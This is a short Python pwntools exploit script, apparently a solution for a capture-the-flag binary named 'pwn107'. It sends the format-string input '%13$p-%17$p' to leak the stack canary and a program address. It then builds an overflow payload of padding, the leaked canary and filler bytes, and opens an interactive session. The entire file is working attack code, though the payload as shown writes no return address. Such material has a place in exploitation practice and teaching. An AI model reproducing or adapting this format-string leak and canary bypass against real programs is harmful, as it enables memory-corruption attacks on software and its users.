
from pwn import *
from sys import argv

context.log_level = "debug"
context.binary = binary = ELF('./pwn107')


p = process('./pwn107')



p.recvuntil(b'streak?')
p.sendline(b'%13$p-%17$p')
p.recv()
resp = p.recv()
resp = resp.split(b'\n')[1].split(b': ')[1].split(b"-")

canary = str(resp[0]).replace('b', '').replace("'", '')
elfAddress = str(resp[1]).replace('b', '').replace("'", '')

print("[+] Canary address : ", canary)
print("[+] ELF address : ", elfAddress)

payload = b'A'*7
payload += p64(int(canary, 16))
payload += b"B"*8

print(payload)

p.sendline(payload)
p.recv()
recv = p.recv()
print("Final ", recv)
#  0xd9ab201b5a8c6400-0x555555400992
p.interactive()
